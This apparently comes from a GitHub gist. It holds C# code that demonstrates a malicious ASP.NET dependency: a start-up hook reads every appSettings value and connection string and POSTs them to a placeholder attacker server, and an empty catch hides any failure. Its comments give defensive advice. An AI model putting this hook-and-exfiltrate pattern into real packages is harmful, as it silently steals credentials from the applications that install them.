
@pjbgf
Last active October 22, 2017 00:19
Dependencies being evil: 1 - Hijacking appsettings and connectionstrings.
using System;
using System.Configuration;
using System.Net.Http;
using System.Text;
using System.Threading.Tasks;
using System.Web;
using SecurityTrap.DoNotUse;
// Assembly-level hook: System.Web's PreApplicationStartMethodAttribute asks ASP.NET to invoke
// EvilCode.RogueAction during application start-up, without the host application's own code
// ever calling it. Assembly-level attributes like this one are worth checking when reviewing a
// third-party package before it is referenced by a web application.
[assembly: PreApplicationStartMethod(typeof(EvilCode), "RogueAction")]
namespace SecurityTrap.DoNotUse
{
/// <summary>
/// Demonstration of what a malicious dependency can do once it is loaded into an ASP.NET
/// application: it reads the host's configuration and sends it to a remote endpoint.
/// </summary>
/// <remarks>
/// The code needs no special privilege: ConfigurationManager exposes appSettings and
/// connectionStrings to any code running in the application. Defensive takeaways: keep secrets
/// out of plain configuration values where possible, restrict outbound network access from web
/// servers to known destinations, and alert on unexpected outbound HTTP requests at start-up.
/// </remarks>
public static class EvilCode
{
/// <summary>
/// Start-up entry point named in the assembly attribute. Collects every appSettings entry and
/// every connection string into one text blob and passes it to <see cref="MakeRequest"/>.
/// </summary>
public static void RogueAction()
{
try
{
var sensitiveData = new StringBuilder();
// One "key:value" line per appSettings entry.
foreach (var key in ConfigurationManager.AppSettings.AllKeys)
sensitiveData.AppendLine($"{key}:{ConfigurationManager.AppSettings[key]}");
// One "name:connectionString" line per connection string; the full string is copied,
// so any credentials embedded in it are included.
for (int i = 0; i < ConfigurationManager.ConnectionStrings.Count; i++)
sensitiveData.AppendLine(
$"{ConfigurationManager.ConnectionStrings[i].Name}:{ConfigurationManager.ConnectionStrings[i].ConnectionString}");
// Blocks the calling thread until the POST task has finished (or faulted).
Task.WaitAll(MakeRequest(sensitiveData.ToString()));
}
// Empty catch-all: every failure is swallowed, so the host application sees no exception
// and nothing is logged. Detection therefore has to come from outside this code
// (network egress monitoring, dependency review), not from application error logs.
catch
{
}
}
/// <summary>
/// Sends <paramref name="value"/> as the body of an HTTP POST.
/// </summary>
/// <param name="value">Text to send as the request content.</param>
/// <returns>The task producing the HTTP response.</returns>
private static async Task<HttpResponseMessage> MakeRequest(string value)
{
var httpClient = new HttpClient();
var content = new StringContent(value);
// "ATTACKER_SERVER" is a placeholder, not an absolute URI: as written, the Uri constructor
// throws, the exception surfaces through the returned task, and the caller's empty catch
// hides it. The sample is inert until a real destination is substituted.
return await httpClient.PostAsync(new Uri("ATTACKER_SERVER"), content);
}
}
}